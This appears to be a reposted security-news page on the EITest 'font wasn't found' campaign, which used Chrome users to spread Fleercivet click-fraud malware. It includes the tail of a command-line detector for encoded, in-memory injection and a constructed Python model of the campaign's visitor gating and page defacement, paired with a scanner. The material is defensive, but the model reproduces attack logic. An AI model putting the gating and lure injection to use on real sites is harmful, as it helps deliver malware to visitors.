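    return [i for i, c in enumerate(cmdlines) if analyze(c, threshold)["flagged"]]


if __name__ == "__main__":
    for i, cmd in enumerate(SAMPLE_COMMANDS):
        r = analyze(cmd)
        print(i, "FLAG" if r["flagged"] else "ok  ", r["score"], r["reasons"])
```

The decoding step matters: an encoded command hides every keyword from a naive string match, and the memory-API and reflective-loading indicators are weighted highest because they are what distinguishes in-memory injection from ordinary administrative scripting, which also uses hidden windows and profile bypasses.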

Author : JP Buntinx

Source : https://themerkle.com/invisible-malware-infects-140-banks-across-40-different-countries/

Categorized in Internet Privacy

Google Chrome users need to be on the lookout for websites trying to trick them into downloading a font update package for their browser, as most chances are that the file is laced with malware.

This infection technique was discovered by Proofpoint researchers, who say that only Chrome users on Windows are targeted, only from specific countries, and only if they navigated to a compromised website using a specific route (referrer), such as search engine results.

Attack replaces HTML tags, destroys web pages

The technique relies on attackers compromising websites and adding their own scripts to the site's source code.

These scripts filter out the incoming traffic and load another malicious script only for Chrome users on Windows.

This second script replaces HTML tags with the sequence "&#0", which ruins the site's content and displays "�" characters all over the page.

These characters are often encountered on websites and in software when there's a font and character rendering problem. As such, the crooks display a popup telling the user that a specific font wasn't found on their device, and the user will need to download and install a font package update.

To give it legitimacy, the popup is marked with Google Chrome's logo and uses classic button styles, as seen on the official Google Chrome website. The original article includes a GIF showing the entire infection chain, captioned "EITest infection chain targeting Chrome users".

According to Proofpoint, this technique was regularly found on hacked sites, as part of the EITest infection chain. EITest is the nickname given to a malware distribution campaign, similar to pseudo-Darkleech.

The group behind EITest works by compromising a large number of websites, usually WordPress or Joomla, using known vulnerabilities.

They act by stealing small amounts of traffic (users) from these sites and redirecting them to a malicious payload.

The EITest campaign appeared in 2014, and over time the final payload has varied greatly, hinting that the EITest group is renting out its traffic source to multiple other cyber-criminal operations.

For the vast majority of its lifespan, the EITest group has rented traffic to exploit kit operators, who used Flash, Silverlight, IE, and other vulnerabilities to install malware on the users' devices automatically, without the user ever noticing anything wrong.
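The reason this campaign is hard to spot is the filtering described above: only a Chrome-on-Windows visitor arriving from a search engine in a targeted country receives the second-stage script, so a crawler with a default user agent and no referrer sees a clean page. The code below is an added example for this page, not Proofpoint's or the campaign's code: it models that gate and shows how a scanner has to emulate the targeted browser, referrer and country to surface the defaced page. The page content, the lure wording, the target-country list and the request profiles are all constructed.

```python
"""Model of visitor gating ("cloaking") in an injected script and a scanner
that probes with several request profiles. Added example; not Proofpoint's
or the campaign's code. Site content and profiles are constructed."""
import re
from typing import Callable, Dict, List

Request = Dict[str, str]
SEARCH_REFERRERS = ("google.", "bing.", "yahoo.")
TARGET_COUNTRIES = {"US", "GB"}  # assumed; the article only says "specific countries"
LURE = '<div id="lure">The font wasn\'t found. <button>Update</button></div>'  # placeholder text
CLEAN_PAGE = "<html><body><h1>Site news</h1><p>Nothing to see.</p></body></html>"  # constructed


def is_target(req: Request) -> bool:
    """First stage: Chrome on Windows, arriving from a search engine, from a
    targeted country. Everyone else gets the untouched page."""
    ua = req.get("user_agent", "")
    ref = req.get("referer", "")
    return ("Chrome/" in ua and "Windows NT" in ua and "Edge/" not in ua
            and any(d in ref for d in SEARCH_REFERRERS)
            and req.get("country", "") in TARGET_COUNTRIES)


def deface(html: str) -> str:
    """Second stage: swap HTML tags for the '&#0' sequence so the browser renders
    replacement characters, then overlay the fake font dialog."""
    return re.sub(r"<[^>]+>", "&#0", html) + LURE


def compromised_site(req: Request) -> str:
    """Stand-in for the hacked site; a real scanner would fetch over HTTP with
    the same headers."""
    return deface(CLEAN_PAGE) if is_target(req) else CLEAN_PAGE


def looks_defaced(html: str) -> bool:
    """Cheap content signature: a run of '&#0' sequences or the lure text."""
    return html.count("&#0") >= 3 or "font wasn't found" in html.lower()


CHROME_WIN = "Mozilla/5.0 (Windows NT 10.0) Chrome/56.0"  # abbreviated UA strings
CHROME_MAC = "Mozilla/5.0 (Macintosh) Chrome/56.0"
PROFILES: Dict[str, Request] = {  # constructed request profiles for the scanner
    "crawler": {"user_agent": "python-requests/2.0"},
    "chrome_win_direct": {"user_agent": CHROME_WIN, "country": "US"},
    "chrome_win_search": {"user_agent": CHROME_WIN, "referer": "https://www.google.com/", "country": "US"},
    "chrome_mac_search": {"user_agent": CHROME_MAC, "referer": "https://www.google.com/", "country": "US"},
    "chrome_win_search_br": {"user_agent": CHROME_WIN, "referer": "https://www.google.com/", "country": "BR"},
}


def scan(site: Callable[[Request], str]) -> Dict[str, bool]:
    """Fetch the site once per profile and record which ones see the payload."""
    return {name: looks_defaced(site(req)) for name, req in PROFILES.items()}


def exposed_profiles(site: Callable[[Request], str]) -> List[str]:
    return [name for name, hit in scan(site).items() if hit]


if __name__ == "__main__":
    for name, hit in scan(compromised_site).items():
        print(f"{name:24s} {'DEFACED' if hit else 'clean'}")
```

Only the profile that satisfies every condition sees the injected content; a security scanner that crawls with its own user agent, without a referrer, or from the wrong geography will report the site clean. That is the practical lesson of the filtering: when checking a site suspected of being part of a campaign like this, probe it as the victim would be seen, not as a crawler.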

Chrome users infected with Fleercivet click-fraud malware

These recent "font wasn't found" attacks on Chrome users are different because they rely on users clicking a download button, something that doesn't guarantee the same high level of successful infections that exploit kits assure.

Proofpoint says that the font update packages that users download via this technique are infected with the Fleercivet click-fraud malware, which works by navigating to preset URLs and clicking on hidden ads behind the user's back, earning crooks money.

This same malware was advertised on underground cybercrime services under the name of Simby in early 2015, and Clicool in late 2015 and in 2016.

Author: Catalin Cimpanu
Source: https://www.bleepingcomputer.com/news/security/chrome-users-targeted-with-malware-via-new-font-wasnt-found-technique

Categorized in Internet Privacy
Association of Internet Research Specialists is the world's leading community for Internet Research Specialists and provides a unified platform that delivers education, training and certification for online research.